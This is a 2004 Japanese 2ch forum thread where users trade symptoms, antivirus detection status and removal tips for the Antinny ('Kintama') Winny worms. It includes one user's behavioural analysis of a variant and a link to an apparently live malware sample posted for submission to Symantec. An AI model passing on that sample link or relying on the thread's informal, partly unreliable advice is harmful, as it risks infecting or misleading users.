落ちてないぞ
てか、昨日から書き込みしてるし

>>705
まじっすか？！ぜんぜん繋がらない。。。

>>706
(･∀･)ｺﾝﾆﾁﾊ!!

　　　　　　　　　　　　47氏
　　　　　　　　　　　　 ↓　, _
　　　　　　V　　　~-ｖ( 'A)丶　　　　／ﾌﾟﾙﾙﾙﾙ･･･
　　　　　［ □］　　 ﾍﾍ ノヽ　　　苗 ￣

　　　ｶﾁｬ
　　　　 ＿＿＿＿＿＿＿／￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　〔 はい、もしも… |　あ、京都府警ですがny流出ファイルの削除方法ありませんか？
　　　 　￣￣￣￣￣Ｖ￣ ＼　 ＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　 　　　　　　　　　　 |／
　　　　　　V　　　　　　('A`】>
　　　　　［ □］　　　 ﾍﾍ ノ ｀~~田


　　　　　　 ＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　〔 ノート返してくれたらやってやるよ 〕
　　　　　 　￣￣￣￣￣Ｖ￣￣￣￣￣￣￣￣￣
　　　　　　V　　　　　　('A`】>
　　　　　［ □］　　　 ﾍﾍ ノ ｀~~田

Antinny.Cに感染してしまった・・・。
個人情報さらされるのはもう仕方ないとして、ｍｐｇ、ｊｐｇ、MP3などのデータが全部２１２KBに改竄されてるんだけど。
消失したデータは数１０G。しかも復旧方法ないらしい。
これってかなり悪質なウイルスなんじゃないの？

>>709
http://pc3.2ch.net/test/read.cgi/sec/1080552371/705

>>709
.Gや.Kの方が良かったとでも？

54 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/04/03(土) 23:03 ID:F+sp4O0s
Antinny.Gのほうがよっぽどやばいぞ。
HDDのファイルを上書きされまくりの悪寒。

100 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/04/03(土) 23:17 ID:F+sp4O0s
血しぶきなんかかわいいものだと判明。
キンタマ(Antinny.G)は全ドライブにある次の拡張子のファイルをぬるぽｶﾞｯで上書きする。
doc xls ppt mdb mp3 jpg mpeg wma zip lzh cab rar cs vbp txt dll
血しぶきが出て悲鳴が聞こえたら、すぐにリセットすべし。
通常時は血しぶきが出てもファイル破壊は行わないが、ゾロ目の日には
ファイルをぬるぽｶﾞｯしまくり。やばいかもと思ったら、とりあえず日付を戻せ。

103 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/04/03(土) 23:19 ID:F+sp4O0s
ちなみに最新のキンタマは一部を暗号化しているので、最新のウイルス定義ファイル
だからといって安心してはいけない。
また、Winnyを起動してなくても常駐しているので、ファイル破壊は当然起こる。
注意せよ

解析結果はいろいろ発表されてるけど
ひとつとして発症したものがないんだよな
ふしぎふしぎ

Gにやられました(´･ω･`)
ｄｌｌ、jpeg、mp3、テキスト、圧縮ファイルがすべて148kbに書き換え
られました(´･ω･`)

ここに書かれている状況が>>713同様ひとつも発症してないんだけど
たぶん、なにかに感染。
PCに入っていたMP3を再生したらHDDがやたらと動き出して
そのMP3をよく見ると、mp3...ずっとむこうにexeでした。
で、ﾉｰﾄﾝも異常無し。
ただWindowsUpdateが出来なくなっています。
それと感染した時刻に作成されているSVCHOST.EXEを￥WINDOWSで発見。
これ更新日が作成以前の日付なんだけど、普通ですか？
削除しちゃったらPC起動しなくなちゃうかな。
おそらく何人かの方が書かれている感染から数日後に発症するやつだと思う。

あいつ、帰ってきたらﾇｯｺﾛｽ。

PCに入っていたMP3

の犯人は、

あいつ

ですか？

自己レス
こっちに似た症状が出てました。
http://tmp2.2ch.net/test/read.cgi/download/1080816795/

>716
昨日、あいつが何かをDLしたのは見たんですよ。
でも今日そのmp3を実行したのは私。
お騒がせしてすみませんでした。
移動します。

>>715
それはひとつも発症してないと言えないと思う。

>>718
御意

こいつが犯人ですよ

>>715 システムの復元で治らない？
ファイル見るときにはまめFILEみたいに
拡張子とファイル名が別フィールドに出るのにすれば
ひっかかりにくいのでは？

>>721
まめってフォルダとか、ファイル名の途中に「.」が入ると
それ以降を拡張子と認識しちゃうみたいなんで
hoge.hoge.（長い空白） .exeみたいのだと気がつきにくいかな？

まぁ、ファイラーを使ってるような人でキンタマに
かかっちゃう人もあまりいないと思うんですけどね（ｗ

だからそういうお馬鹿ちゃんはあふにしとけ。
キーボード型だから入りづらいと思うかもしれないが慣れればかなり(・∀・)ｲｲｿﾞ
別に他のアプリはマウスって人でも全然使えるよ。

http://headlines.yahoo.co.jp/hl?a=20040406-00000412-yom-soci

ｵﾁﾝﾁﾝを高速でそぎおとされますた。

>>723
初心者はマウス使うにきまってるだろ

ダメな奴はファイラ使おうがEnteｒキーにWindowsの関連づけしちまって
即実行。ダブルクリックよりも楽にあの世逝きさ。

俺のキンタマをみてくれないか？
ttp://tool-ya.ddo.jp/2ch/trash-box/file/20040407034853102.png

見所はJですか？

winny使用者はキンタマウイルスに注意
http://pc3.2ch.net/test/read.cgi/sec/1079369336/

キンタマ注意。
http://pc3.2ch.net/test/read.cgi/sec/1079605894/

ぬるぽウイルス猛威
http://pc3.2ch.net/test/read.cgi/sec/1081131323/

★京都府警巡査のＰＣから捜査記録がネット流出
http://pc3.2ch.net/test/read.cgi/sec/1080729577/

AVG対応した？

した

ｱﾝﾁﾄﾞｰﾄはまだだっけか

Kってnyでどんなファイル名でウプされてる？
シマテクみたけど、サイズがいまいち一致しないんだけど

亜種じゃない？
たぶん作者以外もうわからんのでは…

もうどれがどれだか…orz

現在のANTINNY対応状況

●元祖：キモヲタjpg(フォルダアイコン)
ノートン：W32.HLLW.Antinny　(ttp://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.html)
バスター：WORM_ANTINNY.A　(ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.A)

●ハッシュリスト(メモ帳アイコン)
ノートン：W32.HLLW.Antinny.E　(ttp://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.e.html)
バスター：WORM_ANTINNY.B　(ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.B)

●キンタマ(フォルダorメモ帳アイコン)
ノートン：W32.HLLW.Antinny.G　(ttp://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.g.html)
バスター：WORM_ANTINNY.G　(ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.G)

●キンタマ亜種(ACCSに個人情報送信)
ノートン：W32.HLLW.Antinny.K　(ttp://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.k.html)

●不明：よくわからない亜種
バスター：WORM_ANTINNY.C　(ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.C)

●不明：よくわからない亜種
バスター：WORM_ANTINNY.D　(ttp://fr.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=58392&VName=WORM_ANTINNY.D&VSect=T)

●Antinny.ms(仮称)(テキストアイコン？)
未対応

●違法ファイル集めてます(WMPアイコン)
未対応

名前 Antinny.ms（仮）
　　　　Bの亜種？ ノートン、バスター共に未対応
サイズ 1.26MB
開発名 SilentToker　Delphi製

症状
・Windowsフォルダにsvchost.exeを作成。
　無い場合もあり。Systemフォルダのsvchost.exeは問題なし。
・UpFolder.txtに名前BBSでダウンフォルダを追加。
・アップ（ダウン？）フォルダのZIP、LZH、RAR(?)に感染。
・アンチウイルスソフト（ノートン、バスター）の自動実行を無効に。
・毎月第一月曜日に発動。なにやってんのかは不明。
・親と子があり、いずれもSystemフォルダに作成される。
・子はms???.exe（248k）。親はms???.exe（282k）
　子は消しても再起動すると親が作成する。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可
・親はサービスに登録される。
・親子ともにファイルバージョン5.1.3125.1093、製品バージョン6.00.1800.1007。

・3月のはじめにフォルダアイコンのexeを踏んで急いでバスターで駆除
・その後はexe等怪しいファイルは踏まず
・ちなみにこのマシンにはWinnyは存在せず。他のマシンにはＷｉｎｎｙはある
・4/4、用事でずっと不在だったのだが、マシンは立ち上げっぱなし
・4/5にマシンを見てみるとマシン内の全てのdll、jpeg、mp3、txt、zip、ｌｚｈ、rar
　等のファイルが148kbのファイルに書き換えられている
　中身は「ぬるぽ」と「がっ」されている自分（名前付き）
・win.ini、hostsファイルともに変化なし
・再度バスターでスキャンするもなにもなし。が、シマンテックのオンラインスキ
　ャンでsvchost.exe、messengercfg.exe、WINLOGON.exe、codecinstaller_cfg.exe
　がW32.HLLW.Antinny.Gに感染とのこと
・昨晩、画面上に赤い点が現れたのが血しぶきだったのだと今気付く

以上、4/4に発症したものの報告

トレンドマイクロは
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.G
破壊活動の有無: なし

だと。

まあ、所詮は自業自得だからな。
トレンドマイクロも真面目に対処する気はないだろう。

C:\WINDOWS\Temp\qef501.tmp
ってとこのをノートン先生がW32.HLLW.Antinnyっていってきたんだけど

なんでこんなとこから出てくるの？ﾀﾞｳｿしたファイルとかは全部スキャンしてきたんだけど

>>741
(･∀･)ｺﾝﾆﾁﾊ!!

きんたまとかって、nyつけてるだけでも感染する？
ｳｲﾙｽに感染したﾌｧｲﾙを落とさずにﾀﾞﾌﾞﾙｸﾘｯｸとかもせずにいれば
かからないんでしょ？

釣りか？ny起動と同時におまいにわからないように
HDDの中にキンタマが増えていくんだよ。
もう遅い。OS入れ直せ。

>>744
釣りか？ nyを起動してるだけなら感染はしない。
感染したファイルは落ちてくるだろうが。
それと、感染したらnyの起動とは関係なく活動する。
nyによる分散晒し挙げはされないが。

……たぶん。

>>745
わけも分からず火の中に飛び込んでいくようなｳﾞｧｶには
そう言っておいた方がいいだろ？まかり間違って他人の
個人情報流されたらかなわんからな。

CRC16:E837のキンタマ

反応 ＝ ノートン、バスター、Mcafee、ウイルスブロック、e-Trust
スルー ＝ NOD、チェイサー、キラー、Avast!

他はどうなんだろ？

>>747
すごいいいわけ

>>748
NODだめジャン

あそだ、UPXに対応してるAVはなんだっけ？

>>748
AVGも

>>750
NOD32もUPXに対応しているよ。
薄識で批判するのはやめたほうがよい。
NOD32は快適性を追求したAVだからむやみやたらにUPXを検査しないだけだ。
メールやダウンロード時は解凍検査をするしオンデマンドスキャンも検査する。
検査除外になっているのは常駐モジュールだけだ。
それすらも対応シグネチャ（UPX圧縮対応分）が配布されていると捕まえることが可能で普通は問題ない。

自分で故意に圧縮しテストすると常駐モジュールの検査から漏れるだけのことだ。

>>752
>>750の批判は>>748のキンタマ非対応に対してで、UPXに対応して無いとか言ってないと思うけど？

NOD使いには基地外が多いというイメージが拭えない

>>753
被害者が出ていないか、報告がされていないから対応していないだけろうね。
キンタマなんぞ、如何でも良いと個人的には思ってる。

>>755
スレタイ嫁

これだからNO(ry

ホンモノの基地外っているんだね。

NOD32
http://pc3.2ch.net/test/read.cgi/sec/1079933431/505,508,511-523
録音先生（ここの>>755の事）、自作自演がバレて大ピンチ!!!

>752
>753の通りな。

先月、一月ばかりノートンを試用してみたが、思っていたより悪くなかったけ
ど、以前試用した事のあるNOD32ももう一度比較しようと一月ばかり試用している。

チェックスピードとか、GUIの使い勝手はいいんだけど、最近は「対応しない
圧縮ファイルうんぬん」とかのメッセージで一部の圧縮ファイル(LZH,ZIP,etc)
が検知から除外されるよーになった。（前からだったかわからんが・・・）


ちなみにNOD32は、過去（去年8月位かな？）にも英語版を使用した経験がある。


そんなところ。

まんまん

nyでキンタマで検索して自分のUSER名なければ流出してないってこと？
誰か教えてください。

nyでキンタマで検索かけて自分のUSER名がでてなければ
流出してないってこと？

自分のユーザ名のファイルを持ったノードにヒットしなければわからんな。
ファイル名にUSER名が含まれるとは限らんし。

つまり、自分とこから流出してることを確実に確認する方法はないだろな。

exeを自分でクリックすんのを防ぐ手段を知りたいとか言われても

Gにかかったときの対処法教えてもらえますか？
やられました。

ｷｬﾊﾊ

Gに書き換えられたファイルって復元できるの？

>765
ここのテンプレ読むといい。

【警報】Winnyを狙ったワーム・ウイルス情報 Part17
http://tmp2.2ch.net/test/read.cgi/download/1082190076/

というか、>768のテンプレのまとめサイトとかを読むといい。
対処法とかあるから。

(･∀･)ｺﾝﾆﾁﾊ!!
(･∀･)ｺﾝﾆﾁﾝ!!
(･∀･)ｺﾝﾆﾁﾝﾁﾝ!!
(･∀･)ｺｳﾆﾁﾝﾁﾝ!!
(･∀･)ｺﾝﾆﾁﾊ!!

連絡先にメール送られるのは
未実装という事でFA？
報告出てないんだよねぇ、実際

別　名: W32.HLLW.Antinny.G, アンティニー, キンタマウイルス

レジストリを開けとシマンテックに言われるが、開けないのはこれいかに
開けないときの対処もしろよヴォケが
しかもトレンドマイクロのウイルススキャンだと確認できる感染が
ノートンだと確認できない
なめてんのかこの糞ソフトは

ちなみにB

>>773
ひっかかっといて怒るなよｗ
Regedit.exeは上書きされちゃってるから、WindowsのCD-ROMから
更に上書きしてやらないとダメよ。

>>776
情報提供どうもです
ウイルススキャンで感染なしとのことですが、レジストエディタを開こうと
するとノートパッドが開くのはすでに書き換えられているためであって
ウイルスの存在とは関係ないんですかね？

>>777
だから、キンタマに感染した症状としてRegedit.exeがNotepad.exeに書き換えられてるわけ。
つまり感染してます。ウイルススキャンで感染なしと言われるのは、キミが感染したキンタマが
亜種だからだと思う。

>>788
ウイルススキャンでも検出されなくなり、もう大丈夫だと思い書き換えられた
レジストエディタを知り合いのレジストエディタで上書きしました。
今のところは指定して実行からノートパッドが立ち上がることは無くなったのですが
まだ安心できませんかね？

・レジストリを見る
・tempフォルダを見る
・.exeを検索して、フォルダアイコンが無いか調べる

これで完全である訳ではないけど、
折角エディタを復旧したんだから使わないとね

フフフ・・・気持ちいい・・・ペロペロ・・・
　　　　　　　　＿＿＿　）/ 　　　　　 |
　　　　　　／　　　　　, −　 ヽ 　　　|　　　　　　　　　/
　　　　 /　　　　　 ／/　　ヽ　 ヽ 　 |　　　　　　　　　|
　　　　|　　　　　 /　　　/　　　　＼　|　　　　 　　　　|
　　　 |　　　　　 |　　　 | | |　） ) ）｀ 　|　　 　　　　　/
　　　|　　　　　 |　　　 |ﾉﾉノﾉノﾉ　 　/ 　　　　　　　|
　　　 |　　　　　|　　　|　､＿l, |_ 　　|　　　　　　　　　＼
　　　 ゝ　　　 （|　　　| 　￣　　〉　∩/　　　　　　 　　　|
　　　　 ＼ヽ　　.||　　 | "　　 （￣￣/　 　　　　　　　　 |
　　　　　　 w 从|l |ll ﾊ　　　/~￣ﾌ⊃　 　　　　　　　　 |
　　　　　　ヽ/　　||　 /￣￣　 ／〜|　 　　　　　　　　 /

これって感染したら、ノートンでスキャンしても意味無いの？

てすと

avast ny.B対応
AVG ny.C対応
eTrust ny.G対応

他のものでも胡瓜スティックで対応するかもしれんし、
対応してるものでも漏れることもある。（そもそもベンダーで統一してないのだが）

いいものもあれば、悪いものもある。

あぼーん

W32.HLLW.Antinny.Gに感染したんですが、これってハードディスクをフォーマット
してクリーンインストールすれば大丈夫ですかね？感染してかなりびびっています。
よろしくお願いします。

>>786
ゼロセクタ領域にワーム自身のコピーを置いている場合もあるので注意。
ディスク内に、起動時に読み込むパーティションが存在する場合ブート時に再発する恐れがある。
不慣れならハードディスクの追加（新しいほうをブート側に設定）か、買替えをお勧めする。
あと、びびってるとか言うのやめたほうがいいよ。
初心者っぽいと煽られたり叩かれたりするから。
ｶﾞﾝｶﾞﾚ

ゼロセクタってなんですか？検索しても出てこなかったんで。
新しいハードディスクですが、新しい方をブートということは、
システムなどを入れるCドライブを新しいHDDにすればよいということですか？

>>787
キンタマ系(G,K)はそんな面倒臭いことはしてない。

Perflib_Perfdata_7c8.datってウイルスと関係ありですか？
Tempフォルダ内にあるけど常に使用状態で削除できない。。。orz

ゲーム画面を切り替えたら突然デスクトップの
アイコンがメモ帳のアイコンに変化したんですがウイルスですかね？
exeも実行してないしスキャンかけても反応ないし
アイコンが変化した以外何も異常は無いみたいなんですが大丈夫なんしょうか？
変わったのはパソ買ったときについてたライディングソフトです。

ｷﾝﾀﾏに感染したんで、この機会にPCをﾘｶﾊﾞﾘｰしようと思うんですが、
ﾌｧｲﾙをHDDに移動する際に気をつけることはなんですか？

>>[キンタマ] 俺のデスクトップ 北泉　良直 (JASRAC) [04-03-15](ファイル詰め合わせ).zip
の中に入ってる「ごみ箱 .exe」と「電話番号・メアドリスト・カード番号・パスワード等 .exe」
がすげー怪しいんだけどノートン先生反応しないんだよね。

亜種ｷﾀｰ?

>>76
亜種のようですね。実際にDownして最新Nortonで検出されませんでした。
んで解析マシンで実行してみました。

1：「圧縮（zip 形式）フォルダ エラー」の偽メッセージ表示。
2：自分自身のコピーを作成→Program内にランダムに寄生（今回は3つ感染
→例えば名前が「GAME」だったらウイルスのコピー「GAME.exe」を作成。
3：C:\Documents and Settings\ユーザー名\Local Settings\Temp内で　[].txtを発見。
内容は次の通り「 の 、54歳。去年まで金無し君だったけど、WinnyとWinMXで二年でアプリ３５０ギガバイト貯めた。
一度やってみなよ。落とすだけ落としてアップせずに終了することもできるし、キーワードに「無修正」「動画」とか入れて
あとは放っておけば一晩でＨＤがエロムービーで一杯になる。
ソフトがほしけりゃネットで落とせばいいだけ。暇つぶしになる。フォトショップとかＭＳオフィスとか色々あるのでマジでお勧め。」

4:WINDOWS\win.ini、WINDOWS\system.iniに怪しいパス発見。
5:Winny内にUp作成。
6：exe検索で198○年成、2004年成の偽装exeフォルダ発見。Tempにほとんどあった。
さらに355KB検索で空白exeをDドライブなどにも多数発見。アイコンも偽装まくり
7：デスクトップ上に感染日作成、保護されたオペレーティングシステムのexeを発見。ノーアイコン。とりあえず除外中
8:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\Run
内にProgram内に作成したコピーウイルスを発見。削除。MSCONFIG.exeでチェックを外してもよい。

俺以外にAntinyの解析者いらっしゃいますか？他に足りない部分があったら誰か付け加えてください(^_^;)

期待age

>>791
それはWindowsのバグだよ。

なぜ本名を入れるかね？
仕事場のだって入れないし、
普通は「A」とか「あ」とか、俺なら多少凝っても「Fucking ass hole」「飛龍原爆固め」
だから、本名が流れようがない。
メールはしないし

いや、普通に入れる

つか、「A」「あ」のほうが有り得ない
「Fucking ass hole」とかもっと有り得ない、まぁわざと言ってるんだろうが

>>796
釣りですか？
普通、使用者名は本名、もしくは名前を入れるだろ。
100歩引いて単純な英単語をありとしよう
しかし、Fucking ass holeなんてめんどくさいのは釣りとしか思えない

俺はTarouって感じ
本名が太郎だとしたらね。

おれはnullといれてるが

>>800
ga

キンタマが怖いのでnyやめました。

[キンタマ] 俺のデスクトップ user名 [キャプ年月日]
　のuser名ってとこは初めに設定した名前ですか？

ついさっきキンタマの存在を知りますた。（遅すぎ）

不安になってトレンドマイクロでウィルスチェックしたら、
ANTINNYA.Aって見覚えのあるウィルスに感染してた。
うかつだった・・・これってもう流れちゃったってことになるんですか？
そういえば一昨日、解凍しようとしたらAnti-Virusが反応。
ANTINNYA.Aって書いてあって「良く分からないからNOにしとけば万歳だろ」
と思ってNO押した俺。で、解凍しようとしたファイルを完全削除。
・・・でもそれじゃ消えてなかったみたい。鬱。

あと２週間前に再インストールしたけど、する前にUPフォルダってのが
あった気がするんだけど、これってもしかするとキンタマの仕業ですか？

>>804
おめでとう。貴方もきんたまの仲間です。
5月5日までそのままだと面白いことが起こるかもしれませんよ。

メール発射？

>>805
そうか・・・。俺もキンタマユーザーだったのね・・・。
駆除してウィルスチェックで検査したら1→0になったんだけど、
これで100％安全ってことになりますか？
デスクトップにマイドキュメント置いてあったのは中見られてる？
自分のがうｐされてるかどうか確認する方法はありますか？

質問ばっかですいません。

>>798
まさかフリーメールやアンケートで今どき馬鹿正直に本名とか入れる香具師
いないだろ。厳重に管理しますとか書いてても漏れまくってるのが現状。
DMやリアルDMなんか全然じゃまにならないならいいけど。

ユーザ名とかも漏れる可能性が 0 でないって分かってるのに
ローマ字であろうと本名入れてる香具師は漏れてもしょうがないな。
人間、操作ミスはあるもんだ。

>>797 >>798
普通かなー、俺は>>796の言うとおり本名なんて入れないけど
自宅で使う個人用のPCで使用者欄に本名入れるメリットってなんかあるか？
どう考えてもデメリットの方が多いと思うが。
職場のPCはしょうがないにしても、個人用PCの使用者欄に
本名使ってるのなんて初心者だけかと思ってたけど
そういう訳でもないのか？

ノートンの手動アップデートしてスキャンかけたら
antinny.Kがあるわあるわ65個も
Kに感染している疑いのある人はやってみたら良いかと。

>>810
検出されました………

陸上自衛隊の内部資料や顔写真付き社員住所録など、外部に出て
はならない２００種類を超えるデータがインターネットに相次いで流出、
パソコンのファイル交換ソフト「Ｗｉｎｎｙ（ウィニー）」で閲覧できる状態
になっていることが２９日、毎日新聞の調べで分かった。
いったん流出したデータの消去は現状では難しく、ウィニーのネットワ
ークには、日々新データが蓄積される“秘密文書の保管庫”が放置され
ている格好だ。専門家は「早急に技術的な解決策を模索すべきだ」と
指摘している。

防衛庁によると、陸自の内部資料の流出があったのは０２年１１月。第
１普通科連隊重迫撃砲中隊（現在の第５中隊、東京都練馬区）の当時
の幹部が自宅でウィニーを使用し、誤ってパソコンに保存していたデータ
を流出させた。
データは「教育訓練実施計画」「第１中隊総員名簿」「精神教育の書式」
など約１０種類のファイル。隊員の住所や性格、細かい訓練スケジュール、
駐屯地人員や車両状況一覧などが記載され、印刷すると数百枚に及ぶ
という。

フリーで対応してるのはeTrustだけ？

>>809
いや、自宅でも本名入れるなぁ
自分が”使用”してるんだと、主張。。って感じかな
まぁ、逆に言えば個人用だからこそメリット・デメリットを考えないのもあると思うが

もれは履歴書流したことあるよ。
おかげで仕事いっぱいきた。

＞陸自の内部資料の流出があったのは０２年１１月
キンタマと関係ないじゃん…

誤ってじゃなく、わざと流したんだろ？これ。

本名且つ全角文字のユーザー名を使用している者が一番の負け組

本名は分かるけど、全角文字はなぜ？

>>818
ﾌﾟ

>>819
本当に分からないから教えてください。お願いします。

ﾊﾏｻﾞｷｱﾕﾐ

>>820
パスに2バイト文字が入るのはあまり好ましくない
あとは調べれ

>>822
ん？釣りか？
ユーザー名の話だろ

Nortonじゃ見つからなかったが、バスター試用版で検索したら２つも見つかったーYO
どっちも定義ファイルは最新版だす。

あぼーん

ああん。途端にレスがなくなったのはもう大丈夫ぽいから？
不安だよぅ

>>826
Shareに移ったんじゃ。
もれもそうだが---

nyは今急激に過疎化が進んでる、使ってて実感する
有志がなんとかハックしてクラックパッチ対策したバージョンを開発しているようだが、正直もう手遅れだろう

>>828
まがいもんのクラックパッチなんぞ出すからだろ

ニャラルトホテプ作者の狙いどうりって訳か
Shareのような後継ソフトに移行するだけだというに

キンタマ踏んじゃってノートンで削除したつもりが・・・

ノートンの設定ができなくなり
検索やWindowsアップデートが不能となり
立ち上がらないアプリがでてきたり
その他色々不都合が・・・

もう再ｲﾝｽｺ以外ﾀﾞﾒﾎﾟ

あと切ってないし有効のままなのに
システム復元も立ち上がらない・・・

同様の症状の人いてます？

フリーで対応してるのどれなのでしょうか？(´･ω･｀)

>>833
eTrust

>>834
AVGから乗り換えてみます(´･ω･｀)�d

しかしＰＣやオフィスに本名を打ち込む連中の気がしれん。
ワードなんかでホームページつくった日には（これもいるのか？）
ヘッダに本名が入るし、

●新種・亜種ウイルスを発見した場合のサンプル提出方法

ノートン　http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949
ウイルスバスター　http://inet.trendmicro.co.jp/esolution/supform.asp
マカフィー　http://www.nai.com/japan/security/contactavert.asp
ウイルスセキュリティ　https://www.sourcenext.com/qa/action/qagoodslist
NOD32アンチウイルス　http://canon-sol.jp/supp/n_email.html
V3ウイルスブロック　http://www.ahnlab.co.jp/customer/index.asp
ウイルスドクター　http://www.virusdoctor.jp/virus/
ウイルスプロテクター　http://www.lifeboat.jp/support/support.html
ウイルスチェイサー　http://www.viruschaser.jp/support_vc.html
ソフォス　http://www.sophos.co.jp/support/queries/enterprise.html
F-Secure　http://www.f-secure.co.jp/support/
　　　　　　　http://support.f-secure.com/enu/home/virusproblem/sample/

BitDefender　http://www.bitdefender.com/bd/site/contactus.php
AntiVir　http://www.free-av.com/　からSupportをクリック
avast!　http://www.avast.com/i_idt_144.html
eTrust　http://www.caj.co.jp/support/csp/free_policy/virus.htm
AVG　http://www.grisoft.com/us/us_ts_mail.php

ttp://www.sgb.jp/sgb/newtitle/gallery/swf/satsuki_07.swf
ttp://www.sgb.jp/sgb/newtitle/gallery/swf/wakana_07.swf
ttp://www.sgb.jp/sgb/newtitle/gallery/swf/mimina_07.swf
ttp://www.sgb.jp/sgb/newtitle/gallery/swf/megumi_07.swf
ttp://www.sgb.jp/sgb/newtitle/gallery/swf/haruna_07.swf
ttp://www.sgb.jp/sgb/newtitle/gallery/swf/one_07.swf

【危険】現在流行中のウィルス！その4　■■W32.Sasser.Wormとその亜種にご注意！！■■
このウイルスは、MS04-011 の悪用を試みるワームです。ランダムに選択された
IP アドレスを持つコンピュータを走査し、拡散します。亜種も出現しているので、
出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、ウイルススキャンで
検出出来ません。最新の定義ファイルに更新しましょう。

●予防策
MS04-011のパッチを適用する。
http://2style.net/maido/R3_temp.swf?inputStr=%88%DD%8C%8C%8C%EC%8Fe%82%C9%81@%8E%D8%82%E8%83I%83X%83g%83%8D

シマンテック社　Sasser駆除ツール
http://www.symantec.com/region/jp/sarcj/data/w/w32.sasser.removal.tool.html

　

キンタマの亜種にやられた。
ＯＳ再インストールしてすべてを現状復帰するまで三時間掛かったよ。
これからは気をつけねば。(^^)

キンタマこえーー！！

>>842
これからはだいじょうぶだろ、なにせWinny終わりだからな、もう広がらんだろ。

てか スタートアップに regedit を入れとく。
ＰＣ起動時に感染してるかどうか判る。
もしや！っと思ったら regedit を実行する。
これくらいだな。取りあえず被害を最小限にするしかない。

【キーン】金玉蹴られたいアイドル【ピョンピョン】
http://tv3.2ch.net/test/read.cgi/geino/1083568809/

【キーン】金玉蹴られたいアイドル【ピョンピョン】
http://tv6.2ch.net/test/read.cgi/geino/1083568809/

ノー�d未対応のｷﾝﾀﾏなんですが、ｼﾏﾝﾃｯｸに提出しようとしてもメール鯖に接続できません。
ということで誰か代理よろ↓
ttp://pukapuka.or.tp/cgi/img/puka1941.zip
※ほぼ100％ｷﾝﾀﾏなので、nyなどを使っている人は絶対に踏まないでください

ノー�dへの提出方法↓
http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949

>>847
中身のexeは普通にキンタマではないように見えるが。

今日からキンタマの仲間入りしますた。
で、キンタマのはずが、13G残してキャッシュを消す、なんてこともされた
んですが、そんなのもあるんですかね？
あと、削除されたキャッシュは復元不可能なんですか？

>>849
>そんなのもあるんですかね？
有る。
そして復元可能な場合も有る。(直後なら可能性は大)
キャッシュフォルダの有るドライブに これ以上アクセスするな。
それからフリーのファイル復元ツールで復元を試みる。

>>849
ホイ
http://www.vector.co.jp/search/re_0089.html

レスありがとうございます。
直後だったんで、復元ってツール使ってみたんですがｃａｓｈフォルダからの削除が
無かったんですが。。。
復元で見つからないってことは、削除されたのは一体どこに行ってしまったんでしょうか

>>852
% の文字で検索してみたか？

今してみたんですがやっぱり無いです。。

じゃぁクラスタ検索して それでもダメなら落とし直しだな。

復元はゴミ箱経由でないのも検出してくれるのでしょうか？
ウイルスが削除する方法にも対応しているのでしょうか？

> 復元はゴミ箱経由でないのも検出してくれるのでしょうか？
対応しています。

> ウイルスが削除する方法にも対応しているのでしょうか？
ウイルスの削除方法によります。特殊な方法で削除されてしまうと復元できません。

ところでウイルスはＰＣから削除したの？

レジストリエディタから削除してみたんですが。。
できてるのかちょっと心配ですね

ウイルスの種類を調べて正しく対処しないとＯＳの再インストールをする羽目になるよ。
もっともそれが一番安全だけど。

そうですか。。
ウイルスinのファイルは削除したし、ウイルス検索でひっかからなかったから
もう大丈夫かと思ってたんですが。。
種類ですか。。ファイル削除しちゃったから、もうわからないかなぁ

最新のパターンファイルでチェックしたなら まず大丈夫だと思う。
キャッシュは諦めて落とし直した方が良さそうだね。
今なら速度も割と速いし。

そうですか、ではまた落としてみます。
いろいろとありがとうございました。
本当に助かりました。

どういたしまして。あまりお役に立てずゴメンね。
頑張ってください。

>>847
うちもメール鯖につながらんなぁ

今頃症状が出てきますた・・・
壁紙が絵炉画になって、変えようとしてもアクセス通じません。
このスレにあるたいていの検索法は試したんですが、1982年などの古い.exeは結局見つかりませんでした。

そこで質問なんですが、>>847のｷﾝﾀﾏとおぼしき.exeを再度DLして実行すればどこのシステムが改変されたかわかりますか？

江別のキンタマ蜜から無い

どれ？

ウイルスバスター2004の評価版である程度駆除できたんだけど、
regedit開くとまだメモ帳開くってことは、全駆除できてねえんだよな＿|￣|○
どうしたらいいの？

そら既にregedit.exeが同名のノートパッドで上書きされてるから。
またレジストリエディタ入れないとな

やっと壁紙を元に戻せますた・・・
が、まだ「システム管理者〜」という警告と、絵炉画の「siho3」というのが完全に消去できないので、早急に誰かｼﾏﾝﾃｯｸにサンプルを送って下さい。

以前キンタマに感染し、駆除
ところが本日、一斉にいくつものDLLやTXTがぬるぽに
レジストリを見ても再感染したわけではないようだし……
何でだろう……

ヘルプとサポートとか見ながらレジストリ復元とか試みたけどよくわからなかった
どうやるの？

>>871
とりあえずレジストリエディタを戻しなよ

マイコンピュータ全体をregeditで検索
メモ帳アイコンじゃないのが見つかれば、それをメモ帳アイコンのあるところに上書き
なければwindowsのディスクから持ってくる

一番確実な復旧方法は ＣドライブをフォーマットしてからＯＳの再インスールだ。
そして Ｃドライブ以外のドライブで ＥＸＥファイルを検索して怪しそうなのは削除。

>>872-873
レスありがとうございます
マイコンピュータ内検索してもなかったので、ディスクから持ってくる方法で解決しました
